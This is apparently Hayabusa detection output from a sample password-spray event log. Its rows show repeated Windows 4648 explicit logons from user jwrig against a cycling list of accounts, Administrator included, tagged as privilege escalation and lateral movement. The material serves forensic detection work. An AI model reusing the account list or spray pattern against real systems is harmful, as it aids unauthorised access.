LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 
+2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | 
IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | 
LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 
+2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | 
IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | 
LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 
+2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | 
IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | 
LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 
+2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 